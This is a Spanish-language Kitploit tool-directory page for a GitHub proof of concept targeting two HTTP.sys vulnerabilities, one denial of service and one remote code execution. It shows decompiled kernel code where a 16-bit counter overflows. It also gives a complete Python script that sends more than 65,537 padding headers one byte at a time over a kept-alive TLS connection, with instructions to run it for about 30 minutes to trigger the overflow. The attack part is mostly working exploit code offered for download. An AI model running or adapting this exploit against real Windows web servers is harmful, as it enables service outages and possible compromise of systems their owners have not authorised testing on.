Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-49160-CVE-2026-47291-HTTP.sys — Vulnerabilidad de Denegación de Servicio en HTTP.sys y Vulnerabilidad de Ejecución Remota de Código en HTTP.sys | Kitploit
Herramientas/GitHubGitHub/dhmosfunk/cve-2026-49160-cve-2026-47291-http.sys
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubdhmosfunk/cve-2026-49160-cve-2026-47291-http.sys

CVE-2026-49160-CVE-2026-47291-HTTP.sys

Vulnerabilidad de Denegación de Servicio en HTTP.sys y Vulnerabilidad de Ejecución Remota de Código en HTTP.sys

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
52hace 2 mesesAún no revisado

CVE-2026-49160 y CVE-2026-47291 HTTP.sys PoC

Vulnerabilidad de denegación de servicio en HTTP.sys
Vulnerabilidad de ejecución remota de código en HTTP.sys

Debido a las restricciones de tamaño de archivo de GitHub, los videos de demostración de este PoC (CVE-2026-49160) están alojados como adjuntos en los Releases.

CVE-2026-47291

Código vulnerable:

root@kitploit:~
 if ((DAT_0 & 1) != 0) {
            local_e8 = *(int **)(piVar16 + 0x10);
            local_e0 = (char *)ppuVar3;
            WPP_SF_qII(0x408,0x10b,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,piVar16);
          }
          if (*(ushort *)((longlong)piVar16 + 0x642) < *(ushort *)(piVar16 + 400)) {
LAB_8:
            ppuVar1 = ppuVar3 + 4;
            *(undefined ***)
             (*(longlong *)(piVar16 + 0x192) + (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) * 8
             ) = ppuVar3;
            *(short *)((longlong)piVar16 + 0x642) = *(short *)((longlong)piVar16 + 0x642) + 1;
            LOCK();
            iVar10 = *(int *)ppuVar1;
            *(int *)ppuVar1 = *(int *)ppuVar1 + 1;
            UNLOCK();
            if ((UxDebugCheckRefcount != '\0') && (iVar10 + 1 < 0)) {
              UlBugCheckEx(3,ppuVar1,10,(longlong)(iVar10 + 1));
              pcVar4 = (code *)swi(3);
              (*pcVar4)();
              return;
            }
            cVar6 = '\x01';
          }
          else {
            local_e8 = (int *)CONCAT44(local_e8._4_4_,1);
            _Dst = (void *)ExAllocatePool3(0x42,(ulonglong)*(ushort *)(piVar16 + 400) * 8 + 0x28,
                                           0x52526c55,&UxLowPriorityPool);
            if (_Dst != (void *)0x0) {
              memmove(_Dst,*(void **)(piVar16 + 0x192),
                      (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) << 3);
              if (1 < *(ushort *)(piVar16 + 400)) {
                ExFreePoolWithTag(*(undefined8 *)(piVar16 + 0x192),0);
              }
              *(short *)(piVar16 + 400) = (short)piVar16[400] + 5; <- unsigned short 16bit
              *(void **)(piVar16 + 0x192) = _Dst;
              goto LAB_8;
            }
          }
          if ((DAT_0 & 1) != 0) {
            WPP_SF_D(0x408,0x10c,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,cVar6);
          }

Este código

root@kitploit:~
import socket, ssl, time

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

raw_sock = socket.create_connection(("hello.lab", 443))
s = ctx.wrap_socket(raw_sock, server_hostname="hello.lab")
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

request = b"GET / HTTP/1.1\r\nHost: hello.lab\r\nConnection: keep-alive\r\n"
for i in range(0xFFFF+2):
    request += f"X-Pad-{i}: value{i}\r\n".encode()
request += b"\r\n"

for b in request:
    s.send(bytes([b]))

try:
    response = s.recv(4096)
    print(response)
except ConnectionResetError as e:
    print("Connection reset:", e)

print("Connection held open. Press Ctrl+C to close.")
try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("Closing.")
    s.close()

Incrementa el valor del contador en +5.

Deja que el script se ejecute ~30 minutos, ya que el contador aumenta +5 por cada búfer que recibe...

Desbordamiento desencadenado imagen

contador en el depurador: imagen

Descargar herramienta